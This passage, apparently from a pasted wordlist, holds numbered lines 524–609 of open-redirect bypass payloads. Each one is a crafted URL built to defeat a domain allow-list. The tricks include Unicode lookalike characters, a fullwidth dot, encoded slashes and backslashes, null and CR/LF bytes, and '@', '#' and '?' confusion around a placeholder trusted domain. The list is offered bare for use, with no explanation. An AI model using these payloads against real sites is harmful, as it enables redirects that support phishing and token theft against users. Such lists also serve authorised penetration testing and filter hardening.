  524. https://%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  525. /%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  526. /%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  527. //%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  528. //%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  529. ///%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  530. ///%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  531. ////%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  532. ////%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  533. https://%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  534. https://%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  535. /https://%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  536. /https://%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  537. https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  538. https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  539. //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  540. http:Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  541. https:Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  542. //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ%E3%80%82pw
  543. \/\/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  544. /\/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  545. //\/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  546. //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ%00。Pⓦ
  547. https://www.whitelisteddomain.tld/https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  548. 〱Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  549. 〵Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  550. ゝⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  551. ーⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  552. ーⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  553. /〱Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  554. /〵Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  555. /ゝⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  556. /ーⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  557. /ーⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  558. <>//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  559. //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@www.whitelisteddomain.tld
  560. https://:@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@www.whitelisteddomain.tld
  561. http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80#@www.whitelisteddomain.tld/
  562. http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80?@www.whitelisteddomain.tld/
  563. http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  564. http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  565. http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  566. http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  567. http://www.whitelisteddomain.tld+&@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#+@www.whitelisteddomain.tld/
  568. http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\twww.whitelisteddomain.tld/
  569. //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80#@www.whitelisteddomain.tld/
  570. //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80?@www.whitelisteddomain.tld/
  571. //3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  572. //XY>.7d8T\205pZM@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  573. //3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  574. //XY>.7d8T\205pZM@www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  575. //www.whitelisteddomain.tld+&@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#+@www.whitelisteddomain.tld/
  576. //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\twww.whitelisteddomain.tld/
  577. //;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  578. http://;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  579. @Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  580. http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%2f%2f.www.whitelisteddomain.tld/
  581. http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%5c%5c.www.whitelisteddomain.tld/
  582. http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%3F.www.whitelisteddomain.tld/
  583. http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%23.www.whitelisteddomain.tld/
  584. http://www.whitelisteddomain.tld:80%40Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  585. http://www.whitelisteddomain.tld%2eⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  586. /https:/%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  587. https:/%5cⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  588. /http://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  589. /%2f%2fⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  590. //%2f%2fⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  591. /Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  592. /http:/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  593. http:/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  594. /.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  595. http://.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  596. .Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  597. ///\;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  598. ///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  599. /////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  600. /////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  601. http://www.Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\.www.whitelisteddomain.tld
  602. %01https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  603. www.whitelisteddomain.tld;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  604. https://www.whitelisteddomain.tld;@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  605. http:%0a%0dⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  606. https://%0a%0dⓁ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  607. Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/www.whitelisteddomain.tld
  608. https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/www.whitelisteddomain.tld
  609. //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/www.whitelisteddomain.tld
Add Comment
Please, Sign In to add comment